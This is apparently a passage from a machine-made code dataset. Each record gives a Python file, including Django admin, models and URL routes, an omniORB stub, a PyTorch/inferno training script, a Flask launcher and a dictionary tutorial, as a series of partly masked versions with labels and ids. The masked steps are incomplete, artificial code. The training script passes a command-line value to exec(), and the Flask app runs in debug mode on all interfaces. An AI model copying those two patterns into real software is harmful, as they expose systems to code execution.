"step-3": "<mask token>\n\n\nclass CurrencyAdmin(admin.ModelAdmin):\n pass\n\n\nclass UpdAdmin(admin.ModelAdmin):\n pass\n\n\nclass RatesAdmin(admin.ModelAdmin):\n list_filter = ['c_code_id', 'upd_id']\n\n\nadmin.site.register(Currency, CurrencyAdmin)\nadmin.site.register(UpdateInfo, UpdAdmin)\nadmin.site.register(Rates, RatesAdmin)\n",
"step-4": "from django.contrib import admin\nfrom xchanger.models import Currency, Rates, UpdateInfo\n\n\nclass CurrencyAdmin(admin.ModelAdmin):\n pass\n\n\nclass UpdAdmin(admin.ModelAdmin):\n pass\n\n\nclass RatesAdmin(admin.ModelAdmin):\n list_filter = ['c_code_id', 'upd_id']\n\n\nadmin.site.register(Currency, CurrencyAdmin)\nadmin.site.register(UpdateInfo, UpdAdmin)\nadmin.site.register(Rates, RatesAdmin)\n",
"step-5": null,
"step-ids": [
2,
4,
5,
6
]
}
|
[
2,
4,
5,
6
] |
# DO NOT EDIT THIS FILE!
#
# Python module managedElementManager generated by omniidl
import omniORB
omniORB.updateModule("managedElementManager")
# ** 1. Stub files contributing to this module
import managedElementManager_idl
# ** 2. Sub-modules
# ** 3. End
|
normal
|
{
"blob_id": "7727896d4e1b2b415c398b206f9fb7e228e6f26d",
"index": 8602,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nomniORB.updateModule('managedElementManager')\n<mask token>\n",
"step-3": "import omniORB\nomniORB.updateModule('managedElementManager')\nimport managedElementManager_idl\n",
"step-4": "# DO NOT EDIT THIS FILE!\n#\n# Python module managedElementManager generated by omniidl\n\nimport omniORB\nomniORB.updateModule(\"managedElementManager\")\n\n# ** 1. Stub files contributing to this module\nimport managedElementManager_idl\n\n# ** 2. Sub-modules\n\n# ** 3. End\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from django.db import models
from django.contrib.auth.models import User
from django.db.models.deletion import CASCADE
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=CASCADE)
# portfolio = models.ManyToOneRel(User, on_delete=)
def __str__(self):
return f"{self.user.username} Profile"
|
normal
|
{
"blob_id": "51ff1181f0ddac3a8f7cbd9f9d2eedae29a6c559",
"index": 6654,
"step-1": "<mask token>\n\n\nclass Profile(models.Model):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Profile(models.Model):\n <mask token>\n\n def __str__(self):\n return f'{self.user.username} Profile'\n",
"step-3": "<mask token>\n\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, on_delete=CASCADE)\n\n def __str__(self):\n return f'{self.user.username} Profile'\n",
"step-4": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.deletion import CASCADE\n\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, on_delete=CASCADE)\n\n def __str__(self):\n return f'{self.user.username} Profile'\n",
"step-5": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.deletion import CASCADE\n\n\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, on_delete=CASCADE)\n # portfolio = models.ManyToOneRel(User, on_delete=)\n\n def __str__(self):\n return f\"{self.user.username} Profile\"",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/g/kreshuk/lukoianov/miniconda3/envs/inferno/bin/python3
# BASIC IMPORTS
import argparse
import os
import subprocess
import sys
import numpy as np
# INTERNAL IMPORTS
from src.datasets import CentriollesDatasetOn, CentriollesDatasetBags, GENdataset
from src.utils import get_basic_transforms, log_info, get_resps_transforms
import src.implemented_models as impl_models
# INFERNO IMPORTS
import torch
from inferno.trainers.basic import Trainer
from torch.utils.data import DataLoader
from inferno.trainers.callbacks.logging.tensorboard import TensorboardLogger
from inferno.trainers.callbacks.scheduling import AutoLR
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Run learning of simple CNN implementation')
parser.add_argument('--model_name', type=str, default='', help='Name of the model from models dir')
parser.add_argument('--test', action='store_true', help='Test this model on simpler dataset')
parser.add_argument('--features', action='store_true', help='Representation of repsponces')
parser.add_argument('--mil', action='store_true', help='Continue learning on the bag lavel')
parser.add_argument('--id', type=str, default='default', help='Unique net id to save')
parser.add_argument('--img_size', type=int, default=60, help='Size of input images')
args = parser.parse_args()
log_info('Params: ' + str(args))
if args.mil:
train_tr, test_tr = get_resps_transforms(features=args.features)
if args.test:
train_ds = GENdataset(transform=train_tr, bags=False, crop=True)
test_ds = GENdataset(train=False, transform=test_tr, bags=False, crop=True)
log_info('Artificial MIL data is used')
else:
train_ds = CentriollesDatasetBags(transform=train_tr,
inp_size=512, bags=False, crop=True)
test_ds = CentriollesDatasetBags(train=False, transform=test_tr,
inp_size=512, bags=False, crop=True)
log_info('MIL dataset is used')
else:
train_tr, test_tr = get_basic_transforms()
if args.test:
train_ds = CentriollesDatasetOn(transform=train_tr,
pos_dir='dataset/mnist/1',
neg_dir='dataset/mnist/0', inp_size=args.img_size)
test_ds = CentriollesDatasetOn(transform=test_tr,
pos_dir='dataset/mnist/1',
neg_dir='dataset/mnist/0', inp_size=args.img_size, train=False)
log_info('Test bags dataset is used')
else:
train_ds = CentriollesDatasetOn(transform=train_tr,
pos_dir='dataset/artificial/train_pos/',
neg_dir='dataset/artificial/train_neg/',
inp_size=args.img_size, all_data=True)
test_ds = CentriollesDatasetOn(transform=test_tr,
pos_dir='dataset/artificial/test_pos/',
neg_dir='dataset/artificial/test_neg/',
inp_size=args.img_size, all_data=True)
log_info('ILC dataset is used')
train_dl = DataLoader(train_ds, batch_size=4, shuffle=True, num_workers=0)
test_dl = DataLoader(test_ds, batch_size=4, shuffle=True, num_workers=0)
log_info('Datasets are initialized!')
# DIRS AND MODEL
exec("model = impl_models.%s" % (args.model_name))
model_dir = os.path.join('models', args.model_name)
curent_model_dir = os.path.join(model_dir, args.id)
log_info('Model will be saved to %s' % (curent_model_dir))
log_info(' + Number of params: {}'.format(sum([p.data.nelement() for p in model.parameters()])))
weight_dir = os.path.join(curent_model_dir, 'weights')
log_info('Weights will be saved to %s' % (weight_dir))
if not os.path.exists(weight_dir):
os.mkdir(weight_dir)
logs_dir = os.path.join(curent_model_dir, 'logs')
if not os.path.exists(logs_dir):
os.mkdir(logs_dir)
log_info('Logs will be saved to %s' % (logs_dir))
# Build trainer
logger = TensorboardLogger(log_scalars_every=(1, 'iteration'),
log_images_every=(np.inf, 'epochs'))
def log_histogram(self, tag, values, bins=1000):
pass
logger.log_histogram = log_histogram
trainer = Trainer(model)\
.build_criterion('CrossEntropyLoss') \
.build_metric('CategoricalError') \
.build_optimizer('Adam') \
.validate_every((2, 'epochs')) \
.save_every((5, 'epochs')) \
.save_to_directory(weight_dir) \
.set_max_num_epochs(10000) \
.build_logger(logger, log_directory=logs_dir) \
.register_callback(AutoLR(0.96, (1, 'epochs'), monitor_momentum=0.9,
monitor_while='validating',
consider_improvement_with_respect_to='best'))
# Bind loaders
trainer \
.bind_loader('train', train_dl) \
.bind_loader('validate', test_dl)
if torch.cuda.is_available():
trainer.cuda()
trainer.fit()
|
normal
|
{
"blob_id": "604c94e50b1fb9b5e451c4432113498410a4ac1f",
"index": 5262,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\n 'Run learning of simple CNN implementation')\n parser.add_argument('--model_name', type=str, default='', help=\n 'Name of the model from models dir')\n parser.add_argument('--test', action='store_true', help=\n 'Test this model on simpler dataset')\n parser.add_argument('--features', action='store_true', help=\n 'Representation of repsponces')\n parser.add_argument('--mil', action='store_true', help=\n 'Continue learning on the bag lavel')\n parser.add_argument('--id', type=str, default='default', help=\n 'Unique net id to save')\n parser.add_argument('--img_size', type=int, default=60, help=\n 'Size of input images')\n args = parser.parse_args()\n log_info('Params: ' + str(args))\n if args.mil:\n train_tr, test_tr = get_resps_transforms(features=args.features)\n if args.test:\n train_ds = GENdataset(transform=train_tr, bags=False, crop=True)\n test_ds = GENdataset(train=False, transform=test_tr, bags=False,\n crop=True)\n log_info('Artificial MIL data is used')\n else:\n train_ds = CentriollesDatasetBags(transform=train_tr, inp_size=\n 512, bags=False, crop=True)\n test_ds = CentriollesDatasetBags(train=False, transform=test_tr,\n inp_size=512, bags=False, crop=True)\n log_info('MIL dataset is used')\n else:\n train_tr, test_tr = get_basic_transforms()\n if args.test:\n train_ds = CentriollesDatasetOn(transform=train_tr, pos_dir=\n 'dataset/mnist/1', neg_dir='dataset/mnist/0', inp_size=args\n .img_size)\n test_ds = CentriollesDatasetOn(transform=test_tr, pos_dir=\n 'dataset/mnist/1', neg_dir='dataset/mnist/0', inp_size=args\n .img_size, train=False)\n log_info('Test bags dataset is used')\n else:\n train_ds = CentriollesDatasetOn(transform=train_tr, pos_dir=\n 'dataset/artificial/train_pos/', neg_dir=\n 'dataset/artificial/train_neg/', inp_size=args.img_size,\n all_data=True)\n test_ds = CentriollesDatasetOn(transform=test_tr, pos_dir=\n 
'dataset/artificial/test_pos/', neg_dir=\n 'dataset/artificial/test_neg/', inp_size=args.img_size,\n all_data=True)\n log_info('ILC dataset is used')\n train_dl = DataLoader(train_ds, batch_size=4, shuffle=True, num_workers=0)\n test_dl = DataLoader(test_ds, batch_size=4, shuffle=True, num_workers=0)\n log_info('Datasets are initialized!')\n exec('model = impl_models.%s' % args.model_name)\n model_dir = os.path.join('models', args.model_name)\n curent_model_dir = os.path.join(model_dir, args.id)\n log_info('Model will be saved to %s' % curent_model_dir)\n log_info(' + Number of params: {}'.format(sum([p.data.nelement() for p in\n model.parameters()])))\n weight_dir = os.path.join(curent_model_dir, 'weights')\n log_info('Weights will be saved to %s' % weight_dir)\n if not os.path.exists(weight_dir):\n os.mkdir(weight_dir)\n logs_dir = os.path.join(curent_model_dir, 'logs')\n if not os.path.exists(logs_dir):\n os.mkdir(logs_dir)\n log_info('Logs will be saved to %s' % logs_dir)\n logger = TensorboardLogger(log_scalars_every=(1, 'iteration'),\n log_images_every=(np.inf, 'epochs'))\n\n def log_histogram(self, tag, values, bins=1000):\n pass\n logger.log_histogram = log_histogram\n trainer = Trainer(model).build_criterion('CrossEntropyLoss').build_metric(\n 'CategoricalError').build_optimizer('Adam').validate_every((2,\n 'epochs')).save_every((5, 'epochs')).save_to_directory(weight_dir\n ).set_max_num_epochs(10000).build_logger(logger, log_directory=logs_dir\n ).register_callback(AutoLR(0.96, (1, 'epochs'), monitor_momentum=\n 0.9, monitor_while='validating',\n consider_improvement_with_respect_to='best'))\n trainer.bind_loader('train', train_dl).bind_loader('validate', test_dl)\n if torch.cuda.is_available():\n trainer.cuda()\n trainer.fit()\n",
"step-3": "import argparse\nimport os\nimport subprocess\nimport sys\nimport numpy as np\nfrom src.datasets import CentriollesDatasetOn, CentriollesDatasetBags, GENdataset\nfrom src.utils import get_basic_transforms, log_info, get_resps_transforms\nimport src.implemented_models as impl_models\nimport torch\nfrom inferno.trainers.basic import Trainer\nfrom torch.utils.data import DataLoader\nfrom inferno.trainers.callbacks.logging.tensorboard import TensorboardLogger\nfrom inferno.trainers.callbacks.scheduling import AutoLR\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\n 'Run learning of simple CNN implementation')\n parser.add_argument('--model_name', type=str, default='', help=\n 'Name of the model from models dir')\n parser.add_argument('--test', action='store_true', help=\n 'Test this model on simpler dataset')\n parser.add_argument('--features', action='store_true', help=\n 'Representation of repsponces')\n parser.add_argument('--mil', action='store_true', help=\n 'Continue learning on the bag lavel')\n parser.add_argument('--id', type=str, default='default', help=\n 'Unique net id to save')\n parser.add_argument('--img_size', type=int, default=60, help=\n 'Size of input images')\n args = parser.parse_args()\n log_info('Params: ' + str(args))\n if args.mil:\n train_tr, test_tr = get_resps_transforms(features=args.features)\n if args.test:\n train_ds = GENdataset(transform=train_tr, bags=False, crop=True)\n test_ds = GENdataset(train=False, transform=test_tr, bags=False,\n crop=True)\n log_info('Artificial MIL data is used')\n else:\n train_ds = CentriollesDatasetBags(transform=train_tr, inp_size=\n 512, bags=False, crop=True)\n test_ds = CentriollesDatasetBags(train=False, transform=test_tr,\n inp_size=512, bags=False, crop=True)\n log_info('MIL dataset is used')\n else:\n train_tr, test_tr = get_basic_transforms()\n if args.test:\n train_ds = CentriollesDatasetOn(transform=train_tr, pos_dir=\n 'dataset/mnist/1', 
neg_dir='dataset/mnist/0', inp_size=args\n .img_size)\n test_ds = CentriollesDatasetOn(transform=test_tr, pos_dir=\n 'dataset/mnist/1', neg_dir='dataset/mnist/0', inp_size=args\n .img_size, train=False)\n log_info('Test bags dataset is used')\n else:\n train_ds = CentriollesDatasetOn(transform=train_tr, pos_dir=\n 'dataset/artificial/train_pos/', neg_dir=\n 'dataset/artificial/train_neg/', inp_size=args.img_size,\n all_data=True)\n test_ds = CentriollesDatasetOn(transform=test_tr, pos_dir=\n 'dataset/artificial/test_pos/', neg_dir=\n 'dataset/artificial/test_neg/', inp_size=args.img_size,\n all_data=True)\n log_info('ILC dataset is used')\n train_dl = DataLoader(train_ds, batch_size=4, shuffle=True, num_workers=0)\n test_dl = DataLoader(test_ds, batch_size=4, shuffle=True, num_workers=0)\n log_info('Datasets are initialized!')\n exec('model = impl_models.%s' % args.model_name)\n model_dir = os.path.join('models', args.model_name)\n curent_model_dir = os.path.join(model_dir, args.id)\n log_info('Model will be saved to %s' % curent_model_dir)\n log_info(' + Number of params: {}'.format(sum([p.data.nelement() for p in\n model.parameters()])))\n weight_dir = os.path.join(curent_model_dir, 'weights')\n log_info('Weights will be saved to %s' % weight_dir)\n if not os.path.exists(weight_dir):\n os.mkdir(weight_dir)\n logs_dir = os.path.join(curent_model_dir, 'logs')\n if not os.path.exists(logs_dir):\n os.mkdir(logs_dir)\n log_info('Logs will be saved to %s' % logs_dir)\n logger = TensorboardLogger(log_scalars_every=(1, 'iteration'),\n log_images_every=(np.inf, 'epochs'))\n\n def log_histogram(self, tag, values, bins=1000):\n pass\n logger.log_histogram = log_histogram\n trainer = Trainer(model).build_criterion('CrossEntropyLoss').build_metric(\n 'CategoricalError').build_optimizer('Adam').validate_every((2,\n 'epochs')).save_every((5, 'epochs')).save_to_directory(weight_dir\n ).set_max_num_epochs(10000).build_logger(logger, log_directory=logs_dir\n 
).register_callback(AutoLR(0.96, (1, 'epochs'), monitor_momentum=\n 0.9, monitor_while='validating',\n consider_improvement_with_respect_to='best'))\n trainer.bind_loader('train', train_dl).bind_loader('validate', test_dl)\n if torch.cuda.is_available():\n trainer.cuda()\n trainer.fit()\n",
"step-4": "#!/g/kreshuk/lukoianov/miniconda3/envs/inferno/bin/python3\n\n# BASIC IMPORTS\nimport argparse\nimport os\nimport subprocess\nimport sys\nimport numpy as np\n\n# INTERNAL IMPORTS\nfrom src.datasets import CentriollesDatasetOn, CentriollesDatasetBags, GENdataset\nfrom src.utils import get_basic_transforms, log_info, get_resps_transforms\nimport src.implemented_models as impl_models\n\n# INFERNO IMPORTS\nimport torch\nfrom inferno.trainers.basic import Trainer\nfrom torch.utils.data import DataLoader\nfrom inferno.trainers.callbacks.logging.tensorboard import TensorboardLogger\nfrom inferno.trainers.callbacks.scheduling import AutoLR\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Run learning of simple CNN implementation')\n\n parser.add_argument('--model_name', type=str, default='', help='Name of the model from models dir')\n parser.add_argument('--test', action='store_true', help='Test this model on simpler dataset')\n parser.add_argument('--features', action='store_true', help='Representation of repsponces')\n parser.add_argument('--mil', action='store_true', help='Continue learning on the bag lavel')\n parser.add_argument('--id', type=str, default='default', help='Unique net id to save')\n parser.add_argument('--img_size', type=int, default=60, help='Size of input images')\n\n args = parser.parse_args()\n log_info('Params: ' + str(args))\n\n if args.mil:\n train_tr, test_tr = get_resps_transforms(features=args.features)\n if args.test:\n train_ds = GENdataset(transform=train_tr, bags=False, crop=True)\n test_ds = GENdataset(train=False, transform=test_tr, bags=False, crop=True)\n log_info('Artificial MIL data is used')\n else:\n train_ds = CentriollesDatasetBags(transform=train_tr,\n inp_size=512, bags=False, crop=True)\n test_ds = CentriollesDatasetBags(train=False, transform=test_tr,\n inp_size=512, bags=False, crop=True)\n log_info('MIL dataset is used')\n else:\n train_tr, test_tr = get_basic_transforms()\n if 
args.test:\n train_ds = CentriollesDatasetOn(transform=train_tr,\n pos_dir='dataset/mnist/1',\n neg_dir='dataset/mnist/0', inp_size=args.img_size)\n test_ds = CentriollesDatasetOn(transform=test_tr,\n pos_dir='dataset/mnist/1',\n neg_dir='dataset/mnist/0', inp_size=args.img_size, train=False)\n log_info('Test bags dataset is used')\n else:\n train_ds = CentriollesDatasetOn(transform=train_tr,\n pos_dir='dataset/artificial/train_pos/',\n neg_dir='dataset/artificial/train_neg/',\n inp_size=args.img_size, all_data=True)\n test_ds = CentriollesDatasetOn(transform=test_tr,\n pos_dir='dataset/artificial/test_pos/',\n neg_dir='dataset/artificial/test_neg/',\n inp_size=args.img_size, all_data=True)\n log_info('ILC dataset is used')\n\n train_dl = DataLoader(train_ds, batch_size=4, shuffle=True, num_workers=0)\n test_dl = DataLoader(test_ds, batch_size=4, shuffle=True, num_workers=0)\n\n log_info('Datasets are initialized!')\n\n # DIRS AND MODEL\n exec(\"model = impl_models.%s\" % (args.model_name))\n\n model_dir = os.path.join('models', args.model_name)\n curent_model_dir = os.path.join(model_dir, args.id)\n log_info('Model will be saved to %s' % (curent_model_dir))\n log_info(' + Number of params: {}'.format(sum([p.data.nelement() for p in model.parameters()])))\n\n weight_dir = os.path.join(curent_model_dir, 'weights')\n log_info('Weights will be saved to %s' % (weight_dir))\n if not os.path.exists(weight_dir):\n os.mkdir(weight_dir)\n logs_dir = os.path.join(curent_model_dir, 'logs')\n if not os.path.exists(logs_dir):\n os.mkdir(logs_dir)\n log_info('Logs will be saved to %s' % (logs_dir))\n\n # Build trainer\n logger = TensorboardLogger(log_scalars_every=(1, 'iteration'),\n log_images_every=(np.inf, 'epochs'))\n\n def log_histogram(self, tag, values, bins=1000):\n pass\n logger.log_histogram = log_histogram\n\n trainer = Trainer(model)\\\n .build_criterion('CrossEntropyLoss') \\\n .build_metric('CategoricalError') \\\n .build_optimizer('Adam') \\\n .validate_every((2, 
'epochs')) \\\n .save_every((5, 'epochs')) \\\n .save_to_directory(weight_dir) \\\n .set_max_num_epochs(10000) \\\n .build_logger(logger, log_directory=logs_dir) \\\n .register_callback(AutoLR(0.96, (1, 'epochs'), monitor_momentum=0.9,\n monitor_while='validating',\n consider_improvement_with_respect_to='best'))\n\n # Bind loaders\n trainer \\\n .bind_loader('train', train_dl) \\\n .bind_loader('validate', test_dl)\n\n if torch.cuda.is_available():\n trainer.cuda()\n\n trainer.fit()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from app import create_app
from app.config import Config
app = create_app(Config)
if __name__ == "__main__":
app.run(host="0.0.0.0", port=5000, debug=True)
|
normal
|
{
"blob_id": "bea90bbcd4d34b64c21f022b6f3af2bee2d978e4",
"index": 1123,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, debug=True)\n",
"step-3": "<mask token>\napp = create_app(Config)\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, debug=True)\n",
"step-4": "from app import create_app\nfrom app.config import Config\napp = create_app(Config)\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, debug=True)\n",
"step-5": "from app import create_app\nfrom app.config import Config\n\n\napp = create_app(Config)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000, debug=True)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app_name = 'user'
urlpatterns = [url('^$', views.index, name='index'), url('login/', views.
login, name='login'), url('regist/', views.regist, name='regist'), url(
'^getuser\\w*/(?P<id>\\d*)', views.getUserById, name='getuser'), url(
'^sendmessage\\w*/(?P<user_telephone>\\d*)', views.sendMessage, name=
'sendmessage'), url('gettoken', views.getUserbyToken, name=
'getUserbyToken')]
<|reserved_special_token_1|>
from django.conf.urls import url
from . import views
app_name = 'user'
urlpatterns = [url('^$', views.index, name='index'), url('login/', views.
login, name='login'), url('regist/', views.regist, name='regist'), url(
'^getuser\\w*/(?P<id>\\d*)', views.getUserById, name='getuser'), url(
'^sendmessage\\w*/(?P<user_telephone>\\d*)', views.sendMessage, name=
'sendmessage'), url('gettoken', views.getUserbyToken, name=
'getUserbyToken')]
<|reserved_special_token_1|>
from django.conf.urls import url
from .import views
app_name='user'
# user子路由
urlpatterns = [
# user首页
url(r'^$',views.index,name='index'),
# 用户登录
url('login/', views.login, name='login'),
# 用户注册
url('regist/', views.regist, name='regist'),
# 根据id判断用户是否存在
url(r'^getuser\w*/(?P<id>\d*)', views.getUserById, name='getuser'),
# 获取短信验证接口
url(r'^sendmessage\w*/(?P<user_telephone>\d*)',views.sendMessage,name='sendmessage'),
# 根据token查询一定的用户信息 postRight
url(r'gettoken', views.getUserbyToken, name='getUserbyToken'),
]
|
flexible
|
{
"blob_id": "de7b5e44c5c213e4ab70b0f8c0c402edaf4926e0",
"index": 211,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napp_name = 'user'\nurlpatterns = [url('^$', views.index, name='index'), url('login/', views.\n login, name='login'), url('regist/', views.regist, name='regist'), url(\n '^getuser\\\\w*/(?P<id>\\\\d*)', views.getUserById, name='getuser'), url(\n '^sendmessage\\\\w*/(?P<user_telephone>\\\\d*)', views.sendMessage, name=\n 'sendmessage'), url('gettoken', views.getUserbyToken, name=\n 'getUserbyToken')]\n",
"step-3": "from django.conf.urls import url\nfrom . import views\napp_name = 'user'\nurlpatterns = [url('^$', views.index, name='index'), url('login/', views.\n login, name='login'), url('regist/', views.regist, name='regist'), url(\n '^getuser\\\\w*/(?P<id>\\\\d*)', views.getUserById, name='getuser'), url(\n '^sendmessage\\\\w*/(?P<user_telephone>\\\\d*)', views.sendMessage, name=\n 'sendmessage'), url('gettoken', views.getUserbyToken, name=\n 'getUserbyToken')]\n",
"step-4": "\nfrom django.conf.urls import url\nfrom .import views\n\napp_name='user'\n# user子路由\nurlpatterns = [\n\n # user首页\n url(r'^$',views.index,name='index'),\n\n # 用户登录\n url('login/', views.login, name='login'),\n\n # 用户注册\n url('regist/', views.regist, name='regist'),\n\n # 根据id判断用户是否存在\n url(r'^getuser\\w*/(?P<id>\\d*)', views.getUserById, name='getuser'),\n\n # 获取短信验证接口\n url(r'^sendmessage\\w*/(?P<user_telephone>\\d*)',views.sendMessage,name='sendmessage'),\n\n # 根据token查询一定的用户信息 postRight\n url(r'gettoken', views.getUserbyToken, name='getUserbyToken'),\n\n\n\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class Main:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def func():
pass
class Main:
def __init__(self):
pass
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def func():
pass
class Main:
def __init__(self):
pass
if __name__ == '__main__':
pass
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d['spam'])
print(d)
print(len(d))
print('ham' in d)
print(list(d.keys()))
print(list(d.values()))
print(list(d.items()))
for i in d.items():
print(i)
<|reserved_special_token_0|>
print(d)
del d['eggs']
print(d)
<|reserved_special_token_0|>
print(d)
print(list(d.values()))
print(list(d.keys()))
print(list(d.items()))
print(d.get('ham'))
print(d.get('toast'))
print(d.get('toast', 88))
print(d)
<|reserved_special_token_0|>
d.update(d2)
print(d)
print(d.pop('muffin'))
print(d.pop('toast'))
print(d)
<|reserved_special_token_0|>
print(movie)
for year in table:
print(year + '\t' + table[year])
<|reserved_special_token_0|>
print(table2['Holy Grail'])
print(list(table2.items()))
<|reserved_special_token_0|>
print(year_)
<|reserved_special_token_0|>
print(table2[K])
<|reserved_special_token_0|>
print(key)
<|reserved_special_token_0|>
print(key)
<|reserved_special_token_0|>
print(z_)
print(Matrix)
if (2, 3, 6) in Matrix:
print(Matrix[2, 3, 6])
else:
print(0)
try:
print(Matrix[2, 3, 6])
except KeyError:
print(0)
print(Matrix.get((2, 3, 4), 0))
print(Matrix.get((2, 3, 6), 0))
<|reserved_special_token_0|>
print(rec['name'])
<|reserved_special_token_0|>
print(rec['name'])
print(rec['jobs'])
print(rec['jobs'][1])
print(rec['home']['zip'])
<|reserved_special_token_0|>
db.append(rec)
db.append(other)
print(db[0]['jobs'])
<|reserved_special_token_0|>
db['bob']['jobs']
<|reserved_special_token_0|>
print(age_)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(di)
<|reserved_special_token_0|>
print(di)
<|reserved_special_token_0|>
print(fromkeys)
<|reserved_special_token_0|>
print(iterator)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d2)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(k)
print(list(k)[0])
<|reserved_special_token_0|>
print(v)
print(list(v))
print(d.items())
print(list(d.items()))
for k in d.keys():
print(k)
for key in d:
print(key)
print(d)
<|reserved_special_token_0|>
print(Ks)
<|reserved_special_token_0|>
Ks.sort()
print(Ks)
for k in Ks:
print(k, d[k])
print('-------' * 6)
<|reserved_special_token_0|>
for k in sorted(Ks):
print(k, D[k])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def func():
pass
class Main:
def __init__(self):
pass
if __name__ == '__main__':
pass
d = {'name': 'Bob', 'age': 40}
print(d)
d = {'spam': 2, 'ham': 1, 'eggs': 3}
print(d['spam'])
print(d)
print(len(d))
print('ham' in d)
print(list(d.keys()))
print(list(d.values()))
print(list(d.items()))
for i in d.items():
print(i)
d['ham'] = ['grill', 'bake', 'fry']
print(d)
del d['eggs']
print(d)
d['brunch'] = 'Bacon'
print(d)
print(list(d.values()))
print(list(d.keys()))
print(list(d.items()))
print(d.get('ham'))
print(d.get('toast'))
print(d.get('toast', 88))
print(d)
d2 = {'toast': 4, 'muffin': 5}
d.update(d2)
print(d)
print(d.pop('muffin'))
print(d.pop('toast'))
print(d)
table = {'1975': 'Holy Grail', '1979': 'Life of Brain', '1983':
'The Meaning of Life'}
year = '1983'
movie = table[year]
print(movie)
for year in table:
print(year + '\t' + table[year])
table2 = {'Holy Grail': '1975', 'Life of Brain': '1979',
'The Meaning of Life': '1983'}
print(table2['Holy Grail'])
print(list(table2.items()))
year_ = [title for title, year in table2.items() if year == '1975']
print(year_)
K = 'Holy Grail'
print(table2[K])
V = '1975'
key = [key for key, value in table2.items() if value == V]
print(key)
key = [key for key in table2.keys() if table2[key] == V]
print(key)
Matrix = {}
Matrix[2, 3, 4] = 88
Matrix[7, 8, 9] = 99
X = 2
Y = 3
Z = 4
z_ = Matrix[X, Y, Z]
print(z_)
print(Matrix)
if (2, 3, 6) in Matrix:
print(Matrix[2, 3, 6])
else:
print(0)
try:
print(Matrix[2, 3, 6])
except KeyError:
print(0)
print(Matrix.get((2, 3, 4), 0))
print(Matrix.get((2, 3, 6), 0))
rec = {}
rec['name'] = 'Bob'
rec['age'] = 40.5
rec['job'] = 'developer/manager'
print(rec['name'])
rec = {'name': 'Bob', 'jobs': ['developer', 'manager'], 'web':
'www.bobs.org/?Bob', 'home': {'state': 'Overworked', 'zip': 12345}}
print(rec['name'])
print(rec['jobs'])
print(rec['jobs'][1])
print(rec['home']['zip'])
db = []
other = {'name': 'other', 'jobs': ['hr', 'manager'], 'web': 'www.hr.org',
'home': {'state': 'Overworked', 'zip': 55555}}
db.append(rec)
db.append(other)
print(db[0]['jobs'])
db = {}
db['bob'] = rec
db['sue'] = other
db['bob']['jobs']
age_ = {'name': 'Bob', 'age': 40}
print(age_)
d = {}
d['name'] = 'sue'
d['age'] = 50
print(d)
di = dict(name='Bob', age=56)
print(di)
di = dict([('name', 'Bob'), ('age', 55)])
print(di)
fromkeys = dict.fromkeys(['a', 'b'], 0)
print(fromkeys)
iterator = zip(['a', 'b', 'c'], [1, 2, 3])
print(iterator)
d = dict(zip(['a', 'b', 'c'], [1, 2, 3]))
print(d)
d = {k: v for k, v in zip(['a', 'b', 'c'], [1, 2, 3])}
print(d)
d = {x: (x ** 2) for x in [1, 2, 3, 4]}
print(d)
d2 = {x: (x ** 2) for x in range(4)}
print(d2)
d = {c: (c * 4) for c in 'SPAM'}
print(d)
d = {c.lower(): (c + '!') for c in ['spam', 'eggs', 'ham']}
print(d)
d = dict.fromkeys(['a', 'b', 'c'], 0)
print(d)
d = {k: (0) for k in ['a', 'b', 'c']}
print(d)
d = dict.fromkeys('spam')
print(d)
d = dict.fromkeys('spam', 0)
print(d)
d = {k: None for k in 'spam'}
print(d)
d = dict(a=1, b=2, c=3)
print(d)
k = d.keys()
print(k)
print(list(k)[0])
v = d.values()
print(v)
print(list(v))
print(d.items())
print(list(d.items()))
for k in d.keys():
print(k)
for key in d:
print(key)
print(d)
Ks = d.keys()
print(Ks)
Ks = list(Ks)
Ks.sort()
print(Ks)
for k in Ks:
print(k, d[k])
print('-------' * 6)
D = {'b': 2, 'c': 3, 'a': 1}
Ks = D.keys()
for k in sorted(Ks):
print(k, D[k])
<|reserved_special_token_1|>
#!/usr/bin/env python3
# encoding: utf-8
"""
@version: ??
@author: ami
